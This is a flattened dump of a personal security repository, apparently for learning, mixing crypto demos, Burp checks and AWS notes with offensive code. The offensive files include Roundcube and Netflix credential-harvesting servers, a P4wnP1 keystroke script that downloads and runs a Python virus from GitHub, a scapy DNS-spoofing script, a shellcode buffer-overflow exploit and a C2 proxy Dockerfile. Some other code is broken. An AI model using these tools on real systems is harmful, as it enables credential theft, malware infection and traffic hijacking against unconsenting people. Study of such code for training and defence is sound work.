network"); 30 | for (external_ip in outside_local_network) 31 | { 32 | print(external_ip); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /MyTools/BlueTeam/evtinfo/evtinfo.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/csv" 5 | "fmt" 6 | "os" 7 | ) 8 | 9 | func main() { 10 | if len(os.Args) < 2 { 11 | fmt.Println("usage: eventinfo [event_id] [event_id] ...") 12 | return 13 | } 14 | eventIdArgs := os.Args[1:] 15 | csvFile, err := os.Open("events.csv") 16 | if err != nil { 17 | fmt.Printf("there was an error opening file: %s", err) 18 | return 19 | } 20 | defer csvFile.Close() 21 | reader, err := csv.NewReader(csvFile).ReadAll() 22 | if err != nil { 23 | fmt.Printf("an error occured: %s", err) 24 | } 25 | for _, line := range reader { 26 | eventId, description := line[0], line[1] 27 | for _, arg := range eventIdArgs { 28 | if eventId == arg { 29 | fmt.Printf("\u001b[31mEvent ID\u001b[0m: %s\n\u001b[32mDescription\u001b[0m: '%s'\n", eventId, description) 30 | fmt.Println("******************************************************") 31 | } 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /Burp/CustomActions/HttpParameterPollutionCheck.java: -------------------------------------------------------------------------------- 1 | List urlParams = requestResponse.request().parameters(HttpParameterType.URL); 2 | HttpRequest request = requestResponse.request(); 3 | 4 | for (HttpParameter p: urlParams) { 5 | String randStr = api().utilities().randomUtils().randomString(12); 6 | String b64String = api().utilities().base64Utils().encodeToString(randStr); 7 | request = request.withAddedParameters(HttpParameter.urlParameter(p.name(), b64String)); 8 | } 9 | 10 | api().http().sendRequest(request); 11 | logging().logToOutput("[+] check response in Logger tab and review for behaviors that indicate 
the application is vulnerable to parameter polution!!"); 12 | 13 | // observe the submitted request in the Logger tab and see if the application 14 | // processes the first or second parameter. 15 | // Does it validate the first parameter but acts on the second? 16 | // Does it perform the function on both the duplicate parameters? 17 | // etc... -------------------------------------------------------------------------------- /CheatSheets/aws-security-best-practices.md: -------------------------------------------------------------------------------- 1 | # AWS Security Best Practices 2 | 3 | ### Disable Default Execution Endpoint for API Gateway when Using Custom Domain 4 | 5 | - most of the time, you are configuring API gateway to work with a custom domain, and leaving the default execute api endpoint enabled may allow attackers to bypass the security configurations you implemented that apply to requests to your custom domain and not the default api execute api endpoint. 6 | - this also ensures we are reducing the APIs attack surface 7 | 8 | ```console 9 | aws apigateway update-rest-api --rest-api-id "" \ 10 | --patch-operations "op=replace,path=/disableExecuteApiEndpoint,value='True'" \ 11 | --profile $PROFILE 12 | ``` 13 | 14 | ### High-level Security Best Practices Diagram for Basic Serverless Model 15 | 16 | ![image](https://user-images.githubusercontent.com/44281620/188323412-ff3b3de0-4cc7-42ca-8d3d-dac94a55cbe4.png) 17 | 18 | Reference: https://www.youtube.com/watch?v=nEaAuX4O9TU 19 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPClients/Metasploit/client/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "log" 6 | "os" 7 | "rpc" 8 | ) 9 | 10 | var ( 11 | printf := fmt.Printf 12 | println := fmt.Println 13 | ) 14 | 15 | func main() { 16 | host := os.Getenv("MSFHOST") 17 | user := "msf" 18 | pass := os.Getenv("MSFPASS") 19 
| 20 | if host == "" || pass == "" { 21 | log.Fatalln("Missing required environment variables: MSFHOST OR MSFPASS") 22 | } 23 | 24 | msfrpc, err := rpc.New(host, user, pass) 25 | defer msfrpc.Logout() 26 | if err != nil { 27 | log.Panicln(err) 28 | } 29 | 30 | sessions, err := msfrpc.SessionList() 31 | if err != nil { 32 | log.Panicln(err) 33 | } 34 | 35 | println("Metasploit Sessions:") 36 | for _, session := range sessions { 37 | printf("Session Id: %d\n", session.Id) 38 | printf("Session type: %s\n", session.Type) 39 | printf("Session Payload: %s\n", session.Payload) 40 | println("[ -------------------------------------------------- ]") 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/ecb_image_encryption.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 2 | from cryptography.hazmat.backends import default_backend 3 | from sys import argv, exit 4 | from secrets import token_bytes 5 | 6 | if __name__ == "__main__": 7 | if len(argv) < 3: 8 | print(f"Usage: python3 {__file__} quote.bmp [outfile_name].bmp") 9 | exit(1) 10 | 11 | key = token_bytes(32) 12 | cipher = Cipher(algorithms.AES(key), 13 | modes.ECB(), 14 | backend=default_backend()) 15 | encryptor = cipher.encryptor() 16 | 17 | i_f, o_f = argv[1:3] 18 | with open(i_f, "rb") as reader: 19 | with open(o_f, "wb+") as writer: 20 | data = reader.read() 21 | header, body = data[:54], data[54:] 22 | body += b"\x00" * (16-(len(body)%16)) 23 | encrypted_body = encryptor.update(body) 24 | writer.write(header+encrypted_body) 25 | 26 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/README.md: -------------------------------------------------------------------------------- 1 | # PortSwigger Web Security Academy SQL Injection Lab Solutions 
2 | 3 | ### Labs 4 | 5 | - [Lab 1](https://github.com/bin3xish477/cyber-security/blob/master/PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab1/README.md): Retrieving Hidden Data 6 | - [Lab 2](https://github.com/bin3xish477/cyber-security/blob/master/PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab2/README.md): Subverting Application Logic 7 | - [Lab 3](https://github.com/bin3xish477/cyber-security/blob/master/PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab3/README.md): Union Attacks > Determining the Number of Columns 8 | - [Lab 4](https://github.com/bin3xish477/cyber-security/blob/master/PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab4/README.md): Union Attacks > Finding a Column Containing Text 9 | - Lab 5: 10 | - Lab 6: 11 | - Lab 7: 12 | - Lab 8: 13 | - Lab 9: 14 | - Lab 10: 15 | - Lab 11: 16 | - Lab 12: 17 | - Lab 13: 18 | - Lab 14: 19 | - Lab 15: 20 | -------------------------------------------------------------------------------- /DockerStuff/C2Deployments/nginx/Dockerfile: -------------------------------------------------------------------------------- 1 | ####################################### 2 | # build with: 3 | # docker build -t nginx-c2-proxy . 
4 | ####################################### 5 | # run with: 6 | # docker run -d -p 443:443 --name nginx-c2-proxy nginx-c2-proxy 7 | ####################################### 8 | FROM nginx:alpine 9 | 10 | RUN apk update && \ 11 | apk add --no-cache openssl && \ 12 | rm -rf "/var/cache/apk/*" 13 | 14 | RUN openssl req -x509 -nodes -days 365 -newkey rsa:4096 \ 15 | -keyout /etc/ssl/private/nginx.key \ 16 | -out /etc/ssl/certs/nginx.crt \ 17 | -subj "/C=US/O=Mega Corp" 18 | 19 | RUN set -x ; \ 20 | addgroup -g 82 -S www-data ; \ 21 | adduser -u 82 -D -S -G www-data www-data && exit 0 22 | 23 | COPY --chown=www-data:www-data index.html /var/www/html/ 24 | COPY *.conf /etc/nginx/conf.d/ 25 | 26 | RUN rm 2>/dev/null /etc/nginx/sites-enabled/default || true 27 | RUN rm 2>/dev/null /etc/nginx/conf.d/default.conf || true 28 | 29 | EXPOSE 443 30 | 31 | CMD nginx -g "daemon off;" 32 | -------------------------------------------------------------------------------- /Burp/CustomActions/DetectOpenCORSPolicy.java: -------------------------------------------------------------------------------- 1 | public String collaborator = api().collaborator().defaultPayloadGenerator().generatePayload().toString(); 2 | HttpRequest modifiedRequest = requestResponse.request().withRemovedHeader("Origin").withAddedHeader("Origin", collaborator); 3 | HttpResponse resp = api().http().sendRequest(modifiedRequest).response(); 4 | 5 | String ACAC = "Access-Control-Allow-Credentials"; 6 | String ACAO = "Access-Control-Allow-Origin"; 7 | String returnedAccessControlAllowOrigin = ""; 8 | 9 | // check if ACAO and ACAC and that ACAC is set to true 10 | if (resp.hasHeader(ACAO) && resp.hasHeader(ACAC) && resp.headerValue(ACAC).toLowerCase().equals("true")) { 11 | returnedAccessControlAllowOrigin = resp.header("Access-Control-Allow-Origin").value(); 12 | if (returnedAccessControlAllowOrigin.equals(collaborator) || returnedAccessControlAllowOrigin.equals("*")) { 13 | logging.logToOutput("[+] open CORS policy 
identified - the CORS policy reflects the injected payload or returns wildcard"); 14 | } 15 | } -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | "time" 7 | "os" 8 | 9 | "github.com/gorilla/mux" 10 | ) 11 | 12 | func login(w http.ResponseWriter, r *http.Request) { 13 | username := r.FormValue("_user") 14 | password := r.FormValue("_pass") 15 | fmt.Printf("Time: %s\n", time.Now().String()) 16 | fmt.Printf("Username: %s\n", username) 17 | fmt.Printf("Password: %s\n", password) 18 | 19 | f, err := os.OpenFile("creds.txt", os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0600) 20 | defer f.Close() 21 | if err != nil { 22 | panic(err) 23 | } 24 | 25 | out := fmt.Sprintf("Time: %s, Username: %s, Password: %s\n", time.Now().String(), username, password) 26 | _, err = f.WriteString(out) 27 | 28 | http.Redirect(w, r, "/", 302) 29 | } 30 | 31 | func main() { 32 | r := mux.NewRouter() 33 | r.HandleFunc("/login", login).Methods("POST") 34 | r.PathPrefix("/").Handler(http.FileServer(http.Dir("public"))) 35 | http.ListenAndServe("127.0.0.1:8080", r) 36 | } -------------------------------------------------------------------------------- /SecureCodeReview/README.md: -------------------------------------------------------------------------------- 1 | # Secure Code Review 2 | 3 | This folder will contain notes/resources on secure code review. 
4 | 5 | ### External Resources 6 | 7 | - [Secure Code Review Checklist](https://github.com/mgreiler/secure-code-review-checklist/blob/main/README.md) 8 | - [Secure Coding Practices Checklist](https://github.com/RedHatInsights/secure-coding-checklist/blob/master/README.md) 9 | - [C/C++ Secure Code Checklist](https://en.opensuse.org/SDB:Secure_coding_checklist:_C_and_C%2B%2B) 10 | - [Python Security Best Practices (Snyk)](https://snyk.io/blog/python-security-best-practices-cheat-sheet/) 11 | - [Java Secure Coding Guidelines](https://www.oracle.com/java/technologies/javase/seccodeguide.html) 12 | - [Go Secure Coding Practices PDF (OWASP)](https://github.com/OWASP/Go-SCP/blob/master/dist/go-webapp-scp.pdf) 13 | - [Vicki Li's "How to Analyze Code for Vulnerabilities" Talk](https://www.youtube.com/watch?v=A8CNysN-lOM) 14 | - [Ken Johnson & Seth Law: "Secure-er Code Reviews" Talk](https://www.youtube.com/watch?v=89rSpNBtVWE) 15 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Netflix/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | "os" 7 | "time" 8 | 9 | "github.com/gorilla/mux" 10 | ) 11 | 12 | func login(w http.ResponseWriter, r *http.Request) { 13 | username := r.FormValue("userLoginId") 14 | password := r.FormValue("password") 15 | fmt.Printf("Time: %s\n", time.Now().String()) 16 | fmt.Printf("Username: %s\n", username) 17 | fmt.Printf("Password: %s\n", password) 18 | 19 | f, err := os.OpenFile("creds.txt", os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0600) 20 | defer f.Close() 21 | if err != nil { 22 | panic(err) 23 | } 24 | 25 | out := fmt.Sprintf("Time: %s, Username: %s, Password: %s\n", time.Now().String(), username, password) 26 | _, err = f.WriteString(out) 27 | 28 | http.Redirect(w, r, "/", 302) 29 | } 30 | 31 | func main() { 32 | r := mux.NewRouter() 33 | r.HandleFunc("/login", 
login).Methods("POST") 34 | r.PathPrefix("/").Handler(http.FileServer(http.Dir("netflix"))) 35 | http.ListenAndServe("127.0.0.1:8080", r) 36 | } 37 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/P4wnP1/HIDscripts/infectWithPythonVirus.js: -------------------------------------------------------------------------------- 1 | language = "us"; 2 | 3 | function enter() { press("ENTER"); } 4 | 5 | function downloadPyVirus() { 6 | // make temp directory in c:\ to store reverse shell script 7 | type("mkdir C:\\Temp"); 8 | enter(); 9 | delay(200); 10 | // download reverse shell script from Nishang repository 11 | type("IWR 'https://raw.githubusercontent.com/binexisHATT/EthicalHacking/master/PyMalware/PyBackdoorInjection/infect_pyfiles.py' -UseBasicParsing -OutFile 'C:\\Temp\\v.py'"); 12 | enter(); 13 | delay(200); 14 | } 15 | 16 | function executeVirus() { 17 | type("cmd.exe /c 'C:\\Temp\\v.py'); 18 | enter(); 19 | } 20 | 21 | /********************************************************/ 22 | 23 | // keyboard layout 24 | layout(language); 25 | 26 | // emulate someone pressing Windows key + R to run programs 27 | press("WIN R"); 28 | delay(200); 29 | 30 | // open a powershell window 31 | type("powershell"); 32 | enter(); 33 | delay(500); 34 | 35 | downloadPyVirus(); 36 | executeVirus(); 37 | -------------------------------------------------------------------------------- /Misc/DNSAttacks/hijack_entire_domain.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | # flush DNS cache: ipconfig /flushdns 4 | 5 | def hijack_domain(pkt): 6 | """Hijack the entire `example.com` domain""" 7 | if (DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')): 8 | print("Spoofing DNS reply for DNS query for `example.com`") 9 | ip = IP(src=pkt[IP].dst, dst=pkt[IP].src) 10 | udp = UDP(sport=53, dport=pkt[UDP].sport) 11 | 12 | ANssec = DNSRR( 13 | 
rrname=pkt[DNS].qd.qname, type='A', 14 | rdata='1.2.3.4', ttl=259200 15 | ) 16 | NSsec = DNSRR( 17 | rrname="example.com", type="NS", 18 | ttl=259200, rdata='ns.attacker.com' 19 | ) 20 | dns = DNS( 21 | id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, 22 | qr=1, qdcount=1, ancount=1, an=ANssec 23 | ) 24 | 25 | spoofpkt = ip/udp/dns 26 | send(spoofpkt, verbose=0) 27 | 28 | if __name__ == "__main__": 29 | sniff(filter="udp", prn=hijack_domain) -------------------------------------------------------------------------------- /OffensiveGo/HTTPClients/requests_json_api.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "net/http" 7 | ) 8 | 9 | // ExampleJsonResponse defines a struct to the rest api @/todos/1 10 | type ExampleJsonResponse struct { 11 | UserId int 12 | Id int 13 | Title string 14 | Completed bool 15 | } 16 | 17 | func main() { 18 | // Rest API for testing 19 | resp, err := http.Get("https://jsonplaceholder.typicode.com/todos/1") 20 | defer resp.Body.Close() 21 | if err != nil { 22 | panic(resp) 23 | } 24 | 25 | var jsonResponse ExampleJsonResponse 26 | 27 | // Using ```json.NewDecoder``` to invokde ```Decode method``` 28 | // for parsing JSON response into the ExampleJsonResponse struct variable 29 | if err := json.NewDecoder(resp.Body).Decode(&jsonResponse); err != nil { 30 | panic(err) 31 | } 32 | 33 | fmt.Printf("UserId : %d\n", jsonResponse.UserId) 34 | fmt.Printf("Id : %d\n", jsonResponse.Id) 35 | fmt.Printf("Title : %s\n", jsonResponse.Title) 36 | fmt.Printf("Completed : %t\n", jsonResponse.Completed) 37 | } 38 | -------------------------------------------------------------------------------- /Misc/CustomBurpExtensions/BurpAddXForwardedFor.py: -------------------------------------------------------------------------------- 1 | from burp import IBurpExtender 2 | from burp import ISessionHandlingAction 3 | 4 | class BurpExtender(IBurpExtender, 
ISessionHandlingAction): 5 | 6 | def registerExtenderCallbacks(self, callbacks): 7 | self._callbacks = callbacks 8 | self._helpers = callbacks.getHelpers() 9 | callbacks.setExtensionName("Add X-Forwarded-For Header") 10 | callbacks.registerSessionHandlingAction(self) 11 | return 12 | 13 | def getActionName(self): 14 | return None 15 | 16 | def performAction(self, currentRequest, macroItems): 17 | requestInfo = self._helpers.analyzeRequest(currentRequest) 18 | headers = requestInfo.getHeaders() 19 | msgBody = currentRequest.getRequest()[requestInfo.getBodyOffset():] 20 | headers.add("X-Forwarded-For: 192.168.4.28") 21 | message = self._helpers.buildHttpMessage(headers, msgBody) 22 | print(self._helpers.bytesToString(message)) 23 | currentRequest.setRequest(message) 24 | return 25 | 26 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.1.js: -------------------------------------------------------------------------------- 1 | /* Can you spot the vulnerability?? */ 2 | 3 | const express = require('express'); 4 | const User = require('../models/User'); 5 | const bcrypt = require('bcrypt'); 6 | 7 | const router = express.Router(); 8 | 9 | router.post("/register", async (req, res) => { 10 | const { full_name, email, passwd } = res.body; 11 | 12 | if (!(full_name && email && passwd)) { 13 | return res.json("missing fields"); 14 | } 15 | 16 | try { 17 | const userExists = await User.findOne({ email: email }); 18 | if (userExists) { 19 | return res.json({error: "user exists. 
redirecting to login"}); 20 | } 21 | 22 | passwdHash = await bcrypt.hash(passwd, 10); 23 | const user = await User.create({ 24 | full_name: full_name, 25 | email: email.toLowerCase(), 26 | passwd: passwdHash 27 | }); 28 | 29 | return res.json({ full_name, email, createdAt: user.createdAt }); 30 | 31 | } catch (err) { 32 | return res.json(err); 33 | } 34 | }); 35 | 36 | module.exports = router; 37 | -------------------------------------------------------------------------------- /Misc/VPNCreation/tun_interface.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from fcntl import ioctl 3 | from struct import pack 4 | from scapy.all import * 5 | from os import read, write, open, O_RDWR 6 | from subprocess import run 7 | 8 | TUNSETIFF = 0x400454ca 9 | IFF_TUN = 0x0001 10 | IFF_TAP = 0x0002 11 | IFF_NO_PI = 0x1000 12 | 13 | def main(): 14 | tun = open("/dev/net/tun", O_RDWR) 15 | ifr = pack("16sH", b"tun%d", IFF_TUN | IFF_NO_PI) 16 | ifname_bytes = ioctl(tun, TUNSETIFF, ifr) 17 | ifname = ifname_bytes.decode("UTF-8")[:16].strip("\x00") 18 | run(f"ip addr add 192.168.53.100/24 dev {ifname}", shell=True) 19 | run(f"ip link set dev {ifname} up", shell=True) 20 | print(f"VPN TUN INTERFACE: {ifname}") 21 | 22 | 23 | while True: 24 | packet = read(tun, 2048) 25 | if True: 26 | ip = IP(packet) 27 | ip.show() 28 | 29 | newip = IP(src="1.2.3.4", dst=ip.src) 30 | newpkt = newip/ip.payload 31 | write(tun, bytes(newpkt)) 32 | 33 | if __name__ == "__main__": 34 | main() 35 | -------------------------------------------------------------------------------- /APIProjects/Twitter/CyberCrawler/prog_args.py: -------------------------------------------------------------------------------- 1 | from argparse import ArgumentParser 2 | 3 | def parse_args(): 4 | parser=ArgumentParser( 5 | description="Twitter Trending Cyber News or Vulnerabilities Crawler" 6 | ) 7 | parser.add_argument( 8 | "-q", "--query", 9 | type=str, nargs="+", 
10 | metavar="[SearchTerm]", 11 | help="The keyword/s to search for" 12 | ) 13 | parser.add_argument( 14 | "-a", "--auth-file", metavar="FILENAME", 15 | help="JSON file containing Google Sheets API identity info" 16 | ) 17 | parser.add_argument( 18 | "-k", "--url-key", metavar="KEY", 19 | help="The random key found within the URL of the google sheets doc" 20 | ) 21 | parser.add_argument( 22 | "-c", "--count", 23 | type=int, 24 | help="The number of tweets to search for" 25 | ) 26 | parser.add_argument( 27 | "-s", "--console", 28 | action="store_true", 29 | help="Print results to console" 30 | ) 31 | 32 | return parser.parse_args() 33 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/cbc_image_encryption.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 2 | from cryptography.hazmat.backends import default_backend 3 | from sys import argv, exit 4 | from secrets import token_bytes 5 | 6 | if __name__ == "__main__": 7 | if len(argv) < 3: 8 | print(f"Usage: python3 {__file__} quote.bmp [outfile_name].bmp") 9 | exit(1) 10 | 11 | key: bytes = token_bytes(32) 12 | iv: bytes = token_bytes(16) 13 | cipher = Cipher( 14 | algorithms.AES(key), 15 | modes.CBC(iv), 16 | backend=default_backend() 17 | ) 18 | encryptor = cipher.encryptor() 19 | 20 | i_f, o_f = argv[1:3] 21 | with open(i_f, "rb") as reader: 22 | with open(o_f, "wb+") as writer: 23 | data = reader.read() 24 | header, body = data[:54], data[54:] 25 | body += b"\x00" * (16-(len(body)%16)) 26 | encrypted_body = encryptor.update(body) 27 | writer.write(header+encrypted_body) 28 | -------------------------------------------------------------------------------- /Cryptography/MsgIntegritySignaturesCertificates/mac.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers 
import Cipher, algorithms, modes 2 | from cryptography.hazmat.backends import default_backend 3 | from secrets import token_bytes 4 | from hashlib import sha256 5 | 6 | class Encryptor: 7 | 8 | def __init__(self, key, nonce): 9 | aes_ctr = Cipher( 10 | algorithms.AES(key), modes.CTR(nonce), backend=default_backend() 11 | ) 12 | self.encryptor = aes_ctr.encryptor() 13 | self.hasher = sha256() 14 | 15 | def update_encryptor(self, plaintext): 16 | ciphertext = self.encryptor.update(plaintext) 17 | self.hasher.update(ciphertext) 18 | return ciphertext 19 | 20 | def finalize(self): 21 | return self.encryptor.finalize() + self.hasher.digest() 22 | 23 | if __name__ == "__main__": 24 | key = token_bytes(32) 25 | nonce = token_bytes(16) 26 | E = Encryptor(key, nonce) 27 | ciphertext = E.update_encryptor(b"This is a message") 28 | ciphertext += E.finalize() 29 | print(ciphertext) 30 | 31 | 32 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/exploit_notesearch.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char shellcode[]= 6 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 7 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 8 | "\xe1\xcd\x80"; 9 | 10 | int main(int argc, char *argv[]) 11 | { 12 | unsigned int i, *ptr, ret, offset=270; 13 | char *command, *buffer; 14 | 15 | command=(char *) malloc(200); 16 | bzero(command, 200); // Zero out the new memory. 17 | strcpy(command, "./notesearch \'"); // Start command buffer. 18 | buffer=command + strlen(command); // Set buffer at the end. 19 | 20 | if(argc > 1) // Set offset. 21 | offset=atoi(argv[1]); 22 | ret=(unsigned int) &i - offset; // Set return address. 23 | for(i=0; i < 160; i+=4) // Fill buffer with return address. 24 | *((unsigned int *)(buffer+i)) = ret; 25 | memset(buffer, 0x90, 60); // Build NOP sled. 
26 | memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 27 | strcat(command, "\'"); 28 | system(command); // Run exploit. 29 | free(command); 30 | } 31 | -------------------------------------------------------------------------------- /Misc/WindowsRegistry/enumerate_registry_hive.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from winreg import ( 3 | HKEY_CURRENT_USER, 4 | KEY_ALL_ACCESS, 5 | ConnectRegistry, 6 | OpenKey, 7 | EnumValue, 8 | EnumKey, 9 | QueryInfoKey 10 | ) 11 | 12 | from ctypes import ( 13 | windll, 14 | c_long, 15 | byref 16 | ) 17 | 18 | def get_key_values(key): 19 | num_key_values = QueryInfoKey(key)[1] 20 | for i in range(num_key_values): 21 | print("[{}, {}, {}]".format(*EnumValue(key, i))) 22 | 23 | def get_subkeys(key): 24 | j = 0 25 | while True: 26 | try: 27 | yield EnumKey(key, j) 28 | j += 1 29 | except WindowsError: break 30 | 31 | def enumerate_registry_hive(top_registry_key, subkey=None): 32 | with ConnectRegistry(None, top_registry_key) as key: 33 | for subkey in get_subkeys(key): 34 | opened_key = OpenKey(top_registry_key, subkey, 0, KEY_ALL_ACCESS) 35 | get_key_values(opened_key) 36 | 37 | if subkey not None: 38 | 39 | subkey = f"{}" 40 | #enumerate_registry_hive(top_registry_key, subkey=subkey) 41 | 42 | if __name__ == "__main__": 43 | enumerate_registry_hive(HKEY_CURRENT_USER) -------------------------------------------------------------------------------- /Misc/VPNCreation/tap_interface.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from fcntl import ioctl 3 | from struct import pack 4 | from os import read, write, open, O_RDWR 5 | from scapy.all import * 6 | from subprocess import run 7 | 8 | TUNSETIFF = 0x400454ca 9 | IFF_TUN = 0x0001 10 | IFF_TAP = 0x0002 11 | IFF_NO_PI = 0x1000 12 | 13 | def main(): 14 | tun = os.open("/dev/net/tun", O_RDWR) 15 | ifr = pack("16sH", b"tap%d", IFF_TAP | 
IFF_NO_PI) 16 | ifname_bytes = ioctl(tun, TUNSETIFF, ifr) 17 | ifname = ifname_bytes.decode("UTF-8")[:16].strip("\x00") 18 | print(f"VPN TAP INTERFACE: {ifname}") 19 | 20 | run(f"ip addr add 192.168.22.50/24 dev {ifname}", shell=True) 21 | run(f"ip link set dev {ifname} up", shell=True) 22 | 23 | while True: 24 | packet = read(tun, 2048) 25 | if True: 26 | ether = Ether(packet) 27 | ether.show() 28 | 29 | newether = Ether(src="aa:bb:cc:aa:bb:cc", dst=ether.src) 30 | newpkt = newether/ether.payload 31 | write(tun, bytes(newpkt)) 32 | 33 | if __name__ == "__main__": 34 | main() 35 | 36 | -------------------------------------------------------------------------------- /OffensiveGo/EchoServer/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io" 6 | "log" 7 | "net" 8 | ) 9 | 10 | func echo(conn net.Conn) { 11 | defer conn.Close() 12 | 13 | data := make([]byte, 512) 14 | 15 | for { 16 | i, err := conn.Read(data[0:]) 17 | if err == io.EOF { 18 | log.Println("[-] Connection has been terminated") 19 | break 20 | } 21 | if err != nil { 22 | log.Fatalln("[-] An error occured while reading from connection") 23 | break 24 | } 25 | 26 | fmt.Printf("Received %d bytes:\n%s", i, string(data)) 27 | 28 | if _, err = conn.Write(data[0:i]); err != nil { 29 | log.Fatalln("[-] An error occured writing to connection") 30 | } 31 | } 32 | } 33 | 34 | func main() { 35 | listener, err := net.Listen("tcp", "127.0.0.1:1337") 36 | if err != nil { 37 | log.Fatalln("Unable to create listener on port 127.0.0.1:1337") 38 | } 39 | fmt.Println("[+] Listening on 127.0.0.1:1337") 40 | 41 | for { 42 | conn, err := listener.Accept() 43 | if err != nil { 44 | log.Fatalln("Unable to receive connection from client") 45 | } 46 | go echo(conn) 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /AmazonWebServices/security-services/README.md: 
-------------------------------------------------------------------------------- 1 | # AWS Security Services Overview 2 | 3 | I'll be adding more information for each service in the near future 4 | 5 | ### Identity & Access Management 6 | 7 | |Service Name|Description| 8 | |---|---| 9 | |IAM|| 10 | |Cognito|| 11 | |Directory Service|| 12 | |Resource Access Manager|| 13 | |Organizations|| 14 | 15 | ### Detection 16 | 17 | |Service Name|Description| 18 | |---|---| 19 | |Security Hub|| 20 | |GuardDuty|| 21 | |Inspector|| 22 | |Config|| 23 | |CloudTrail|| 24 | |IoT Device Defender|| 25 | 26 | ### Network and application protection 27 | 28 | |Service Name|Description| 29 | |---|---| 30 | |Network Firewall|| 31 | |Shield|| 32 | |Route 53 Resolver DNS Firewall|| 33 | |Web Application Firewall (WAF)|| 34 | |Firewall Manager|| 35 | 36 | ### Data Protection 37 | 38 | |Service Name|Description| 39 | |---|---| 40 | |Amazon Macie|| 41 | |Key Management Service (KMS)|| 42 | |CloudHSM|| 43 | |Certificate Manager|| 44 | |Secrets Manager|| 45 | 46 | ### Incident Response 47 | 48 | |Service Name|Description| 49 | |---|---| 50 | |Amazon Detective|| 51 | |Elastic Disaster Recovery|| 52 | -------------------------------------------------------------------------------- /SLAE/HelloWorld/hello.nasm: -------------------------------------------------------------------------------- 1 | ; Author : Alexis Rodriguez 2 | ; Date : 06/28/2020 3 | ; File : hello.asm 4 | ; IS : IA-32 5 | 6 | global _start ; use _start as the entry point into the program, similar to main function 7 | 8 | ; the .text section contains the body of our code 9 | section .text 10 | _start: 11 | ; print hello world to stdout 12 | mov eax, 0x4 ; system call, write 13 | mov ebx, 0x1 ; file descriptor 1, stdout 14 | mov ecx, message ; move address of message variable into ecx reg. 
15 | mov edx, mlen ; compute the message length 16 | int 0x80 ; invoke system call 17 | 18 | ; exiting program 19 | mov eax, 0x1 ; system call, exit 20 | mov ebx, 0x5 ; return 5 after running 21 | int 0x80 ; invoke system call 22 | 23 | ; the .data section all initialized data 24 | section .data 25 | message: db "Hello World!" ; defining data that will be used in program 26 | mlen: equ $-message ; store the length of 'message' in mlen 27 | 28 | ; running program 29 | ; nasm -f elf32 -o hello.o hello.asm 30 | ; ld -m elf_i386 -s -o hello hello.o 31 | ; echo $? to check if program returned 5 as expected (line 20) -------------------------------------------------------------------------------- /Cryptography/AsymmetricEncryption/homomorphic_rsa.py: -------------------------------------------------------------------------------- 1 | from rsa import RSA 2 | from gmpy2 import powmod, invert 3 | 4 | def rsa_encrypt(plaintext, publickey): 5 | nums = publickey.public_numbers() 6 | return powmod(plaintext, nums.e, nums.n) 7 | 8 | def rsa_decrypt(ciphertext, privatekey): 9 | nums = privatekey.private_numbers() 10 | return powmod(ciphertext, nums.d, nums.public_numbers.n) 11 | 12 | if __name__ == "__main__": 13 | manager = RSA(public_exponent=65537, key_size=2048) 14 | 15 | private_key = manager.private_key 16 | public_key = manager.public_key 17 | 18 | n = public_key.public_numbers().n 19 | a = 5 20 | b = 10 21 | 22 | encrypted_a = rsa_encrypt(a, public_key) 23 | encrypted_b = rsa_encrypt(b, public_key) 24 | 25 | # mutiplying the encrypted value of a with the 26 | # encrypted value of b, to obtain the product of 27 | # both encrypted values 28 | encrypted_product = (encrypted_a * encrypted_b) % n 29 | # getting the product of the two plaintext values 30 | product = rsa_decrypt(encrypted_product, private_key) 31 | 32 | print(f"{a} x {b} = {product}") 33 | -------------------------------------------------------------------------------- 
